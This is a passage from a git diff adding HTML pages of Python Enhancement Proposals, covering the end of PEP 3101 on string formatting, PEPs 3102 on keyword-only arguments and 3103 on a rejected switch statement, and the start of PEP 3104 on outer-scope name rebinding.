+
+
+

Error handling

+

There are two classes of exceptions which can occur during formatting: +exceptions generated by the formatter code itself, and exceptions +generated by user code (such as a field object’s ‘getattr’ function).

+

In general, exceptions generated by the formatter code itself are +of the “ValueError” variety – there is an error in the actual “value” +of the format string. (This is not always true; for example, the +string.format() function might be passed a non-string as its first +parameter, which would result in a TypeError.)

+

The text associated with these internally generated ValueError +exceptions will indicate the location of the exception inside +the format string, as well as the nature of the exception.

+

For exceptions generated by user code, a trace record and +dummy frame will be added to the traceback stack to help +in determining the location in the string where the exception +occurred. The inserted traceback will indicate that the +error occurred at:

+
File "<format_string>;", line XX, in column_YY
+
+
+

where XX and YY represent the line and character position +information in the string, respectively.

+
+
+
+

Alternate Syntax

+

Naturally, one of the most contentious issues is the syntax of the +format strings, and in particular the markup conventions used to +indicate fields.

+

Rather than attempting to exhaustively list all of the various +proposals, I will cover the ones that are most widely used +already.

+
    +
  • Shell variable syntax: $name and $(name) (or in some variants, ${name}). This is probably the oldest convention out there, and is used by Perl and many others. When used without the braces, the length of the variable name is determined by lexically scanning until an invalid character is found.

    This scheme is generally used in cases where interpolation is +implicit - that is, in environments where any string can contain +interpolation variables, and no special substitution function +need be invoked. In such cases, it is important to prevent the +interpolation behavior from occurring accidentally, so the ‘$’ +(which is otherwise a relatively uncommonly-used character) is +used to signal when the behavior should occur.

    +

    It is the author’s opinion, however, that in cases where the formatting is explicitly invoked, less care needs to be taken to prevent accidental interpolation, in which case a lighter and less unwieldy syntax can be used.

    +
  • +
  • printf and its cousins (‘%’), including variations that add a +field index, so that fields can be interpolated out of order.
  • +
  • Other bracket-only variations. Various MUDs (Multi-User Dungeons) such as MUSH have used brackets (e.g. [name]) to do string interpolation. The Microsoft .Net libraries use braces ({}), and a syntax which is very similar to the one in this proposal, although the syntax for format specifiers is quite different. [4]
  • +
  • Backquoting. This method has the benefit of minimal syntactical +clutter, however it lacks many of the benefits of a function +call syntax (such as complex expression arguments, custom +formatters, etc.).
  • +
  • Other variations include Ruby’s #{}, PHP’s {$name}, and so +on.
  • +
+

Some specific aspects of the syntax warrant additional comments:

+

1) Backslash character for escapes. The original version of +this PEP used backslash rather than doubling to escape a bracket. +This worked because backslashes in Python string literals that +don’t conform to a standard backslash sequence such as \n +are left unmodified. However, this caused a certain amount +of confusion, and led to potential situations of multiple +recursive escapes, i.e. \\\\{ to place a literal backslash +in front of a bracket.

+

2) The use of the colon character (‘:’) as a separator for +format specifiers. This was chosen simply because that’s +what .Net uses.

+
+
+

Alternate Feature Proposals

+

Restricting attribute access: An earlier version of the PEP +restricted the ability to access attributes beginning with a +leading underscore, for example “{0}._private”. However, this +is a useful ability to have when debugging, so the feature +was dropped.

+

Some developers suggested that the ability to do ‘getattr’ and +‘getitem’ access should be dropped entirely. However, this +is in conflict with the needs of another set of developers who +strongly lobbied for the ability to pass in a large dict as a +single argument (without flattening it into individual keyword +arguments using the **kwargs syntax) and then have the format +string refer to dict entries individually.

+

There have also been suggestions to expand the set of expressions that are allowed in a format string. However, this was seen to go against the spirit of TOOWTDI, since the same effect can be achieved in most cases by executing the same expression on the parameter before it’s passed in to the formatting function. For cases where the format string is being used to do arbitrary formatting in a data-rich environment, it’s recommended to use a template engine specialized for this purpose, such as Genshi [5] or Cheetah [6].

+

Many other features were considered and rejected because they +could easily be achieved by subclassing Formatter instead of +building the feature into the base implementation. This includes +alternate syntax, comments in format strings, and many others.

+
+
+

Security Considerations

+

Historically, string formatting has been a common source of +security holes in web-based applications, particularly if the +string formatting system allows arbitrary expressions to be +embedded in format strings.

+

The best way to use string formatting in a way that does not +create potential security holes is to never use format strings +that come from an untrusted source.

+

Barring that, the next best approach is to ensure that string +formatting has no side effects. Because of the open nature of +Python, it is impossible to guarantee that any non-trivial +operation has this property. What this PEP does is limit the +types of expressions in format strings to those in which visible +side effects are both rare and strongly discouraged by the +culture of Python developers. So for example, attribute access +is allowed because it would be considered pathological to write +code where the mere access of an attribute has visible side +effects (whether the code has invisible side effects - such +as creating a cache entry for faster lookup - is irrelevant.)

+
+
+

Sample Implementation

+

An implementation of an earlier version of this PEP was created by +Patrick Maupin and Eric V. Smith, and can be found in the pep3101 +sandbox at:

+
+
+
+
+

Backwards Compatibility

+

Backwards compatibility can be maintained by leaving the existing +mechanisms in place. The new system does not collide with any of +the method names of the existing string formatting techniques, so +both systems can co-exist until it comes time to deprecate the +older system.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3101.rst

+


diff --git a/pep-3102/index.html b/pep-3102/index.html
new file mode 100644
index 00000000000..2a3f85a4390
--- /dev/null
+++ b/pep-3102/index.html
@@ -0,0 +1,284 @@

PEP 3102 – Keyword-Only Arguments

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2006
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2006, 19-May-2006
+
+
+
+
+
+

Abstract

+

This PEP proposes a change to the way that function arguments are +assigned to named parameter slots. In particular, it enables the +declaration of “keyword-only” arguments: arguments that can only +be supplied by keyword and which will never be automatically +filled in by a positional argument.

+
+
+

Rationale

+

The current Python function-calling paradigm allows arguments to +be specified either by position or by keyword. An argument can be +filled in either explicitly by name, or implicitly by position.

+

There are often cases where it is desirable for a function to take +a variable number of arguments. The Python language supports this +using the ‘varargs’ syntax (*name), which specifies that any +‘left over’ arguments be passed into the varargs parameter as a +tuple.

+

One limitation on this is that currently, all of the regular +argument slots must be filled before the vararg slot can be.

+

This is not always desirable. One can easily envision a function +which takes a variable number of arguments, but also takes one +or more ‘options’ in the form of keyword arguments. Currently, +the only way to do this is to define both a varargs argument, +and a ‘keywords’ argument (**kwargs), and then manually extract +the desired keywords from the dictionary.

+
+
+

Specification

+

Syntactically, the proposed changes are fairly simple. The first +change is to allow regular arguments to appear after a varargs +argument:

+
def sortwords(*wordlist, case_sensitive=False):
+    ...
+
+
+

This function accepts any number of positional arguments, and it +also accepts a keyword option called ‘case_sensitive’. This +option will never be filled in by a positional argument, but +must be explicitly specified by name.

+

Keyword-only arguments are not required to have a default value. +Since Python requires that all arguments be bound to a value, +and since the only way to bind a value to a keyword-only argument +is via keyword, such arguments are therefore ‘required keyword’ +arguments. Such arguments must be supplied by the caller, and +they must be supplied via keyword.

+
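A sketch of such a ‘required keyword’ argument; the connect function and its parameters are hypothetical:

def connect(host, *flags, timeout):
    # 'timeout' can only be supplied by keyword, and has no default,
    # so it is a required keyword argument.
    return (host, flags, timeout)

connect('example.com', timeout=30)    # ('example.com', (), 30)
# connect('example.com', 30)          # TypeError: 30 lands in *flags,
#                                     # leaving 'timeout' unbound
# connect('example.com')              # TypeError: 'timeout' is missing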

The second syntactical change is to allow the argument name to +be omitted for a varargs argument. The meaning of this is to +allow for keyword-only arguments for functions that would not +otherwise take a varargs argument:

+
def compare(a, b, *, key=None):
+    ...
+
+
+

The reasoning behind this change is as follows. Imagine for a +moment a function which takes several positional arguments, as +well as a keyword argument:

+
def compare(a, b, key=None):
+    ...
+
+
+

Now, suppose you wanted to have ‘key’ be a keyword-only argument. +Under the above syntax, you could accomplish this by adding a +varargs argument immediately before the keyword argument:

+
def compare(a, b, *ignore, key=None):
+    ...
+
+
+

Unfortunately, the ‘ignore’ argument will also suck up any +erroneous positional arguments that may have been supplied by the +caller. Given that we’d prefer any unwanted arguments to raise an +error, we could do this:

+
def compare(a, b, *ignore, key=None):
+    if ignore:  # If ignore is not empty
+        raise TypeError
+
+
+

As a convenient shortcut, we can simply omit the ‘ignore’ name, +meaning ‘don’t allow any positional arguments beyond this point’.

+

(Note: After much discussion of alternative syntax proposals, the +BDFL has pronounced in favor of this ‘single star’ syntax for +indicating the end of positional parameters.)

+
+
+

Function Calling Behavior

+

The previous section describes the difference between the old +behavior and the new. However, it is also useful to have a +description of the new behavior that stands by itself, without +reference to the previous model. So this next section will +attempt to provide such a description.

+

When a function is called, the input arguments are assigned to +formal parameters as follows:

+
    +
  • For each formal parameter, there is a slot which will be used +to contain the value of the argument assigned to that +parameter.
  • +
  • Slots which have had values assigned to them are marked as +‘filled’. Slots which have no value assigned to them yet are +considered ‘empty’.
  • +
  • Initially, all slots are marked as empty.
  • +
  • Positional arguments are assigned first, followed by keyword +arguments.
  • +
  • For each positional argument:
      +
    • Attempt to bind the argument to the first unfilled +parameter slot. If the slot is not a vararg slot, then +mark the slot as ‘filled’.
    • +
    • If the next unfilled slot is a vararg slot, and it does +not have a name, then it is an error.
    • +
    • Otherwise, if the next unfilled slot is a vararg slot then +all remaining non-keyword arguments are placed into the +vararg slot.
    • +
    +
  • +
  • For each keyword argument:
      +
    • If there is a parameter with the same name as the keyword, +then the argument value is assigned to that parameter slot. +However, if the parameter slot is already filled, then that +is an error.
    • +
    • Otherwise, if there is a ‘keyword dictionary’ argument, +the argument is added to the dictionary using the keyword +name as the dictionary key, unless there is already an +entry with that key, in which case it is an error.
    • +
    • Otherwise, if there is no keyword dictionary, and no +matching named parameter, then it is an error.
    • +
    +
  • +
  • Finally:
      +
    • If the vararg slot is not yet filled, assign an empty tuple +as its value.
    • +
    • For each remaining empty slot: if there is a default value +for that slot, then fill the slot with the default value. +If there is no default value, then it is an error.
    • +
    +
  • +
+

In accordance with the current Python implementation, any errors +encountered will be signaled by raising TypeError. (If you want +something different, that’s a subject for a different PEP.)

+
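A small example tracing the binding rules above (the function is hypothetical; results in comments):

def f(a, b=0, *rest, key=None):
    return (a, b, rest, key)

f(1, 2, 3, 4, key='k')    # (1, 2, (3, 4), 'k')
f(1)                      # (1, 0, (), None) - defaults fill the empty slots
# f(1, 2, a=9)            # TypeError: the slot for 'a' is already filled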
+
+

Backwards Compatibility

+

The function calling behavior specified in this PEP is a superset +of the existing behavior - that is, it is expected that any +existing programs will continue to work.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3102.rst

+


diff --git a/pep-3103/index.html b/pep-3103/index.html
new file mode 100644
index 00000000000..23cda7f0daf
--- /dev/null
+++ b/pep-3103/index.html
@@ -0,0 +1,733 @@

PEP 3103 – A Switch/Case Statement

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Jun-2006
+
Python-Version:
+
3.0
+
Post-History:
+
26-Jun-2006
+
+
+
+
+
+

Rejection Notice

+

A quick poll during my keynote presentation at PyCon 2007 shows this +proposal has no popular support. I therefore reject it.

+
+
+

Abstract

+

Python-dev has recently seen a flurry of discussion on adding a switch +statement. In this PEP I’m trying to extract my own preferences from +the smorgasbord of proposals, discussing alternatives and explaining +my choices where I can. I’ll also indicate how strongly I feel about +alternatives I discuss.

+

This PEP should be seen as an alternative to PEP 275. My views are +somewhat different from that PEP’s author, but I’m grateful for the +work done in that PEP.

+

This PEP introduces canonical names for the many variants that have +been discussed for different aspects of the syntax and semantics, such +as “alternative 1”, “school II”, “option 3” and so on. Hopefully +these names will help the discussion.

+
+
+

Rationale

+

A common programming idiom is to consider an expression and do +different things depending on its value. This is usually done with a +chain of if/elif tests; I’ll refer to this form as the “if/elif +chain”. There are two main motivations to want to introduce new +syntax for this idiom:

+
    +
  • It is repetitive: the variable and the test operator, usually ‘==’ +or ‘in’, are repeated in each if/elif branch.
  • +
  • It is inefficient: when an expression matches the last test value +(or no test value at all) it is compared to each of the preceding +test values.
  • +
+

Both of these complaints are relatively mild; there isn’t a lot of +readability or performance to be gained by writing this differently. +Yet, some kind of switch statement is found in many languages and it +is not unreasonable to expect that its addition to Python will allow +us to write up certain code more cleanly and efficiently than before.

+
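For reference, here is the idiom in question, written first as the if/elif chain and then with the kind of hand-built dispatch dict that the dict-based proposals discussed below take as their model (names are hypothetical):

def describe(x):
    if x == 1:
        return 'one'
    elif x == 2:
        return 'two'
    else:
        return 'many'

# The same dispatch, precomputed as a single dict lookup:
_CASES = {1: 'one', 2: 'two'}

def describe_dict(x):
    return _CASES.get(x, 'many')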

There are forms of dispatch that are not suitable for the proposed +switch statement; for example, when the number of cases is not +statically known, or when it is desirable to place the code for +different cases in different classes or files.

+
+
+

Basic Syntax

+

I’m considering several variants of the syntax first proposed in PEP +275 here. There are lots of other possibilities, but I don’t see that +they add anything.

+

I’ve recently been converted to alternative 1.

+

I should note that all alternatives here have the “implicit break” +property: at the end of the suite for a particular case, the control +flow jumps to the end of the whole switch statement. There is no way +to pass control from one case to another. This in contrast to C, +where an explicit ‘break’ statement is required to prevent falling +through to the next case.

+

In all alternatives, the else-suite is optional. It is more Pythonic +to use ‘else’ here rather than introducing a new reserved word, +‘default’, as in C.

+

Semantics are discussed in the next top-level section.

+
+

Alternative 1

+

This is the preferred form in PEP 275:

+
switch EXPR:
+    case EXPR:
+        SUITE
+    case EXPR:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

The main downside is that the suites where all the action is are +indented two levels deep; this can be remedied by indenting the cases +“half a level” (e.g. 2 spaces if the general indentation level is 4).

+
+
+

Alternative 2

+

This is Fredrik Lundh’s preferred form; it differs by not indenting +the cases:

+
switch EXPR:
+case EXPR:
+    SUITE
+case EXPR:
+    SUITE
+....
+else:
+    SUITE
+
+
+

Some reasons not to choose this include expected difficulties for +auto-indenting editors, folding editors, and the like; and confused +users. There are no situations currently in Python where a line +ending in a colon is followed by an unindented line.

+
+
+

Alternative 3

+

This is the same as alternative 2 but leaves out the colon after the +switch:

+
switch EXPR
+case EXPR:
+    SUITE
+case EXPR:
+    SUITE
+....
+else:
+    SUITE
+
+
+

The hope of this alternative is that it will upset the auto-indent logic of the average Python-aware text editor less. But it looks strange to me.

+
+
+

Alternative 4

+

This leaves out the ‘case’ keyword on the basis that it is redundant:

+
switch EXPR:
+    EXPR:
+        SUITE
+    EXPR:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

Unfortunately now we are forced to indent the case expressions, because otherwise (at least in the absence of an ‘else’ keyword) the parser would have a hard time distinguishing between an unindented case expression (which continues the switch statement) and an unrelated statement that starts like an expression (such as an assignment or a procedure call). The parser is not smart enough to backtrack once it sees the colon. This is my least favorite alternative.

+
+
+
+

Extended Syntax

+

There is one additional concern that needs to be addressed syntactically. Often two or more values need to be treated the same. In C, this is done by writing multiple case labels together without any code between them. The “fall through” semantics then mean that these are all handled by the same code. Since the Python switch will not have fall-through semantics (which have yet to find a champion) we need another solution. Here are some alternatives.

+
+

Alternative A

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case EXPR, EXPR, ...:
+
+
+

to match on multiple expressions. This is interpreted so that if EXPR is a parenthesized tuple or another expression whose value is a tuple, the switch expression must equal that tuple, not one of its elements. This means that we cannot use a variable to indicate multiple cases. While this is also true in C’s switch statement, it is a relatively common occurrence in Python (see for example sre_compile.py).

+
+
+

Alternative B

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case in EXPR_LIST:
+
+
+

to match on multiple expressions. If EXPR_LIST is a single +expression, the ‘in’ forces its interpretation as an iterable (or +something supporting __contains__, in a minority semantics +alternative). If it is multiple expressions, each of those is +considered for a match.

+
+
+

Alternative C

+

Use:

+
case EXPR:
+
+
+

to match on a single expression; use:

+
case EXPR, EXPR, ...:
+
+
+

to match on multiple expressions (as in alternative A); and use:

+
case *EXPR:
+
+
+

to match on the elements of an expression whose value is an iterable. +The latter two cases can be combined, so that the true syntax is more +like this:

+
case [*]EXPR, [*]EXPR, ...:
+
+
+

The * notation is similar to the use of prefix * already in use for +variable-length parameter lists and for passing computed argument +lists, and often proposed for value-unpacking (e.g. a, b, *c = X as +an alternative to (a, b), c = X[:2], X[2:]).

+
+
+

Alternative D

+

This is a mixture of alternatives B and C; the syntax is like +alternative B but instead of the ‘in’ keyword it uses ‘*’. This is +more limited, but still allows the same flexibility. It uses:

+
case EXPR:
+
+
+

to match on a single expression and:

+
case *EXPR:
+
+
+

to match on the elements of an iterable. If one wants to specify +multiple matches in one case, one can write this:

+
case *(EXPR, EXPR, ...):
+
+
+

or perhaps this (although it’s a bit strange because the relative +priority of ‘*’ and ‘,’ is different than elsewhere):

+
case * EXPR, EXPR, ...:
+
+
+
+
+

Discussion

+

Alternatives B, C and D are motivated by the desire to specify +multiple cases with the same treatment using a variable representing a +set (usually a tuple) rather than spelling them out. The motivation +for this is usually that if one has several switches over the same set +of cases it’s a shame to have to spell out all the alternatives each +time. An additional motivation is to be able to specify ranges to +be matched easily and efficiently, similar to Pascal’s “1..1000:” +notation. At the same time we want to prevent the kind of mistake +that is common in exception handling (and which will be addressed in +Python 3000 by changing the syntax of the except clause): writing +“case 1, 2:” where “case (1, 2):” was meant, or vice versa.

+

The case could be made that the need is insufficient for the added +complexity; C doesn’t have a way to express ranges either, and it’s +used a lot more than Pascal these days. Also, if a dispatch method +based on dict lookup is chosen as the semantics, large ranges could be +inefficient (consider range(1, sys.maxint)).

+

All in all my preferences are (from most to least favorite) B, A, D’, +C, where D’ is D without the third possibility.

+
+
+
+

Semantics

+

There are several issues to review before we can choose the right +semantics.

+
+

If/Elif Chain vs. Dict-based Dispatch

+

There are several main schools of thought about the switch statement’s +semantics:

+
    +
  • School I wants to define the switch statement in terms of an equivalent if/elif chain (possibly with some optimization thrown in).
  • +
  • School II prefers to think of it as a dispatch on a precomputed +dict. There are different choices for when the precomputation +happens.
  • +
  • There’s also school III, which agrees with school I that the +definition of a switch statement should be in terms of an equivalent +if/elif chain, but concedes to the optimization camp that all +expressions involved must be hashable.
  • +
+

We need to further separate school I into school Ia and school Ib:

+
    +
  • School Ia has a simple position: a switch statement is translated to +an equivalent if/elif chain, and that’s that. It should not be +linked to optimization at all. That is also my main objection +against this school: without any hint of optimization, the switch +statement isn’t attractive enough to warrant new syntax.
  • +
  • School Ib has a more complex position: it agrees with school II that +optimization is important, and is willing to concede the compiler +certain liberties to allow this. (For example, PEP 275 Solution 1.) +In particular, hash() of the switch and case expressions may or may +not be called (so it should be side-effect-free); and the case +expressions may not be evaluated each time as expected by the +if/elif chain behavior, so the case expressions should also be +side-effect free. My objection to this (elaborated below) is that +if either the hash() or the case expressions aren’t +side-effect-free, optimized and unoptimized code may behave +differently.
  • +
+

School II grew out of the realization that optimization of commonly +found cases isn’t so easy, and that it’s better to face this head on. +This will become clear below.

+

The differences between school I (mostly school Ib) and school II are +threefold:

+
    +
  • When optimizing using a dispatch dict, if either the switch +expression or the case expressions are unhashable (in which case +hash() raises an exception), school Ib requires catching the hash() +failure and falling back to an if/elif chain. School II simply lets +the exception happen. The problem with catching an exception in +hash() as required by school Ib, is that this may hide a genuine +bug. A possible way out is to only use a dispatch dict if all case +expressions are ints, strings or other built-ins with known good +hash behavior, and to only attempt to hash the switch expression if +it is also one of those types. Type objects should probably also be +supported here. This is the (only) problem that school III +addresses.
  • +
  • When optimizing using a dispatch dict, if the hash() function of any expression involved returns an incorrect value, under school Ib, optimized code will not behave the same as unoptimized code. This is a well-known problem with optimization-related bugs, and wastes lots of developer time. Under school II, in this situation incorrect results are produced at least consistently, which should make debugging a bit easier. The way out proposed for the previous bullet would also help here.
  • +
  • School Ib doesn’t have a good optimization strategy if the case +expressions are named constants. The compiler cannot know their +values for sure, and it cannot know whether they are truly constant. +As a way out, it has been proposed to re-evaluate the expression +corresponding to the case once the dict has identified which case +should be taken, to verify that the value of the expression didn’t +change. But strictly speaking, all the case expressions occurring +before that case would also have to be checked, in order to preserve +the true if/elif chain semantics, thereby completely killing the +optimization. Another proposed solution is to have callbacks +notifying the dispatch dict of changes in the value of variables or +attributes involved in the case expressions. But this is not likely +implementable in the general case, and would require many namespaces +to bear the burden of supporting such callbacks, which currently +don’t exist at all.
  • +
  • Finally, there’s a difference of opinion regarding the treatment of duplicate cases (i.e. two or more cases with match expressions that evaluate to the same value). School I wants to treat this the same as an if/elif chain would treat it (i.e. the first match wins and the code for the second match is silently unreachable); school II wants this to be an error at the time the dispatch dict is frozen (so dead code doesn’t go undiagnosed).
  • +
+

School I sees trouble in school II’s approach of pre-freezing a +dispatch dict because it places a new and unusual burden on +programmers to understand exactly what kinds of case values are +allowed to be frozen and when the case values will be frozen, or they +might be surprised by the switch statement’s behavior.

+

School II doesn’t believe that school Ia’s unoptimized switch is worth +the effort, and it sees trouble in school Ib’s proposal for +optimization, which can cause optimized and unoptimized code to behave +differently.

+

In addition, school II sees little value in allowing cases involving +unhashable values; after all if the user expects such values, they can +just as easily write an if/elif chain. School II also doesn’t believe +that it’s right to allow dead code due to overlapping cases to occur +unflagged, when the dict-based dispatch implementation makes it so +easy to trap this.

+

However, there are some use cases for overlapping/duplicate cases. +Suppose you’re switching on some OS-specific constants (e.g. exported +by the os module or some module like that). You have a case for each. +But on some OS, two different constants have the same value (since on +that OS they are implemented the same way – like O_TEXT and O_BINARY +on Unix). If duplicate cases are flagged as errors, your switch +wouldn’t work at all on that OS. It would be much better if you could +arrange the cases so that one case has preference over another.

+

There’s also the (more likely) use case where you have a set of cases +to be treated the same, but one member of the set must be treated +differently. It would be convenient to put the exception in an +earlier case and be done with it.

+

(Yes, it seems a shame not to be able to diagnose dead code due to +accidental case duplication. Maybe that’s less important, and +pychecker can deal with it? After all we don’t diagnose duplicate +method definitions either.)

+

This suggests school IIb: like school II but redundant cases must be +resolved by choosing the first match. This is trivial to implement +when building the dispatch dict (skip keys already present).

+

(An alternative would be to introduce new syntax to indicate “okay to +have overlapping cases” or “ok if this case is dead code” but I find +that overkill.)

+

Personally, I’m in school II: I believe that the dict-based dispatch +is the one true implementation for switch statements and that we +should face the limitations up front, so that we can reap maximal +benefits. I’m leaning towards school IIb – duplicate cases should be +resolved by the ordering of the cases instead of flagged as errors.

+
+
+

When to Freeze the Dispatch Dict

+

For the supporters of school II (dict-based dispatch), the next big +dividing issue is when to create the dict used for switching. I call +this “freezing the dict”.

+

The main problem that makes this interesting is the observation that +Python doesn’t have named compile-time constants. What is +conceptually a constant, such as re.IGNORECASE, is a variable to the +compiler, and there’s nothing to stop crooked code from modifying its +value.

+
+

Option 1

+

The most limiting option is to freeze the dict in the compiler. This +would require that the case expressions are all literals or +compile-time expressions involving only literals and operators whose +semantics are known to the compiler, since with the current state of +Python’s dynamic semantics and single-module compilation, there is no +hope for the compiler to know with sufficient certainty the values of +any variables occurring in such expressions. This is widely though +not universally considered too restrictive.

+

Raymond Hettinger is the main advocate of this approach. He proposes +a syntax where only a single literal of certain types is allowed as +the case expression. It has the advantage of being unambiguous and +easy to implement.

+

My main complaint about this is that by disallowing “named constants” +we force programmers to give up good habits. Named constants are +introduced in most languages to solve the problem of “magic numbers” +occurring in the source code. For example, sys.maxint is a lot more +readable than 2147483647. Raymond proposes to use string literals +instead of named “enums”, observing that the string literal’s content +can be the name that the constant would otherwise have. Thus, we +could write “case ‘IGNORECASE’:” instead of “case re.IGNORECASE:”. +However, if there is a spelling error in the string literal, the case +will silently be ignored, and who knows when the bug is detected. If +there is a spelling error in a NAME, however, the error will be caught +as soon as it is evaluated. Also, sometimes the constants are +externally defined (e.g. when parsing a file format like JPEG) and we +can’t easily choose appropriate string values. Using an explicit +mapping dict sounds like a poor hack.

+
+
+

Option 2

+

The oldest proposal to deal with this is to freeze the dispatch dict +the first time the switch is executed. At this point we can assume +that all the named “constants” (constant in the programmer’s mind, +though not to the compiler) used as case expressions are defined – +otherwise an if/elif chain would have little chance of success either. +Assuming the switch will be executed many times, doing some extra work +the first time pays back quickly by very quick dispatch times later.

+

An objection to this option is that there is no obvious object where +the dispatch dict can be stored. It can’t be stored on the code +object, which is supposed to be immutable; it can’t be stored on the +function object, since many function objects may be created for the +same function (e.g. for nested functions). In practice, I’m sure that +something can be found; it could be stored in a section of the code +object that’s not considered when comparing two code objects or when +pickling or marshalling a code object; or all switches could be stored +in a dict indexed by weak references to code objects. The solution +should also be careful not to leak switch dicts between multiple +interpreters.

+

Another objection is that the first-use rule allows obfuscated code +like this:

+
def foo(x, y):
+    switch x:
+    case y:
+        print 42
+
+
+

To the untrained eye (not familiar with Python) this code would be +equivalent to this:

+
def foo(x, y):
+    if x == y:
+        print 42
+
+
+

but that’s not what it does (unless it is always called with the same +value as the second argument). This has been addressed by suggesting +that the case expressions should not be allowed to reference local +variables, but this is somewhat arbitrary.

+

A final objection is that in a multi-threaded application, the +first-use rule requires intricate locking in order to guarantee the +correct semantics. (The first-use rule suggests a promise that side +effects of case expressions are incurred exactly once.) This may be +as tricky as the import lock has proved to be, since the lock has to +be held while all the case expressions are being evaluated.

+
+
+

Option 3

+

A proposal that has been winning support (including mine) is to freeze +a switch’s dict when the innermost function containing it is defined. +The switch dict is stored on the function object, just as parameter +defaults are, and in fact the case expressions are evaluated at the +same time and in the same scope as the parameter defaults (i.e. in the +scope containing the function definition).

+

This option has the advantage of avoiding many of the finesses needed +to make option 2 work: there’s no need for locking, no worry about +immutable code objects or multiple interpreters. It also provides a +clear explanation for why locals can’t be referenced in case +expressions.

+

This option works just as well for situations where one would +typically use a switch; case expressions involving imported or global +named constants work exactly the same way as in option 2, as long as +they are imported or defined before the function definition is +encountered.

+

A downside however is that the dispatch dict for a switch inside a +nested function must be recomputed each time the nested function is +defined. For certain “functional” styles of programming this may make +switch unattractive in nested functions. (Unless all case expressions +are compile-time constants; then the compiler is of course free to +optimize away the switch freezing code and make the dispatch table part +of the code object.)

+

Another downside is that under this option, there’s no clear moment +when the dispatch dict is frozen for a switch that doesn’t occur +inside a function. There are a few pragmatic choices for how to treat +a switch outside a function:

+
    +
  1. Disallow it.
  2. +
  3. Translate it into an if/elif chain.
  4. +
  5. Allow only compile-time constant expressions.
  6. +
  7. Compute the dispatch dict each time the switch is reached.
  8. +
  9. Like (b) but tests that all expressions evaluated are hashable.
  10. +
+

Of these, (a) seems too restrictive: it’s uniformly worse than (c); +and (d) has poor performance for little or no benefits compared to +(b). It doesn’t make sense to have a performance-critical inner loop +at the module level, as all local variable references are slow there; +hence (b) is my (weak) favorite. Perhaps I should favor (e), which +attempts to prevent atypical use of a switch; examples that work +interactively but not in a function are annoying. In the end I don’t +think this issue is all that important (except it must be resolved +somehow) and am willing to leave it up to whoever ends up implementing +it.

+

When a switch occurs in a class but not in a function, we can freeze +the dispatch dict at the same time the temporary function object +representing the class body is created. This means the case +expressions can reference module globals but not class variables. +Alternatively, if we choose (b) above, we could choose this +implementation inside a class definition as well.

+
+
+

Option 4

+

There are a number of proposals to add a construct to the language +that makes the concept of a value pre-computed at function definition +time generally available, without tying it either to parameter default +values or case expressions. Some keywords proposed include ‘const’, +‘static’, ‘only’ or ‘cached’. The associated syntax and semantics +vary.

+

These proposals are out of scope for this PEP, except to suggest that +if such a proposal is accepted, there are two ways for the switch to +benefit: we could require case expressions to be either compile-time +constants or pre-computed values; or we could make pre-computed values +the default (and only) evaluation mode for case expressions. The +latter would be my preference, since I don’t see a use for more +dynamic case expressions that isn’t addressed adequately by writing an +explicit if/elif chain.

+
+
+
+
+

Conclusion

+

It is too early to decide. I’d like to see at least one completed +proposal for pre-computed values before deciding. In the meantime, +Python is fine without a switch statement, and perhaps those who claim +it would be a mistake to add one are right.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3103.rst

+


diff --git a/pep-3104/index.html b/pep-3104/index.html
new file mode 100644
index 00000000000..68466f19999
--- /dev/null
+++ b/pep-3104/index.html
@@ -0,0 +1,706 @@

PEP 3104 – Access to Names in Outer Scopes

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Oct-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

In most languages that support nested scopes, code can refer to or +rebind (assign to) any name in the nearest enclosing scope. +Currently, Python code can refer to a name in any enclosing scope, +but it can only rebind names in two scopes: the local scope (by +simple assignment) or the module-global scope (using a global +declaration).

+

This limitation has been raised many times on the Python-Dev mailing +list and elsewhere, and has led to extended discussion and many +proposals for ways to remove this limitation. This PEP summarizes +the various alternatives that have been suggested, together with +advantages and disadvantages that have been mentioned for each.

+
+
+

Rationale

+

Before version 2.1, Python’s treatment of scopes resembled that of +standard C: within a file there were only two levels of scope, global +and local. In C, this is a natural consequence of the fact that +function definitions cannot be nested. But in Python, though +functions are usually defined at the top level, a function definition +can be executed anywhere. This gave Python the syntactic appearance +of nested scoping without the semantics, and yielded inconsistencies +that were surprising to some programmers – for example, a recursive +function that worked at the top level would cease to work when moved +inside another function, because the recursive function’s own name +would no longer be visible in its body’s scope. This violates the +intuition that a function should behave consistently when placed in +different contexts. Here’s an example:

+
def enclosing_function():
+    def factorial(n):
+        if n < 2:
+            return 1
+        return n * factorial(n - 1)  # fails with NameError
+    print factorial(5)
+
+
+

Python 2.1 moved closer to static nested scoping by making visible +the names bound in all enclosing scopes (see PEP 227). This change +makes the above code example work as expected. However, because any +assignment to a name implicitly declares that name to be local, it is +impossible to rebind a name in an outer scope (except when a +global declaration forces the name to be global). Thus, the +following code, intended to display a number that can be incremented +and decremented by clicking buttons, doesn’t work as someone familiar +with lexical scoping might expect:

+
def make_scoreboard(frame, score=0):
+    label = Label(frame)
+    label.pack()
+    for i in [-10, -1, 1, 10]:
+        def increment(step=i):
+            score = score + step  # fails with UnboundLocalError
+            label['text'] = score
+        button = Button(frame, text='%+d' % i, command=increment)
+        button.pack()
+    return label
+
+
+

Python syntax doesn’t provide a way to indicate that the name +score mentioned in increment refers to the variable score +bound in make_scoreboard, not a local variable in increment. +Users and developers of Python have expressed an interest in removing +this limitation so that Python can have the full flexibility of the +Algol-style scoping model that is now standard in many programming +languages, including JavaScript, Perl, Ruby, Scheme, Smalltalk, +C with GNU extensions, and C# 2.0.

+

It has been argued that such a feature isn’t necessary, because +a rebindable outer variable can be simulated by wrapping it in a +mutable object:

+
class Namespace:
+    pass
+
+def make_scoreboard(frame, score=0):
+    ns = Namespace()
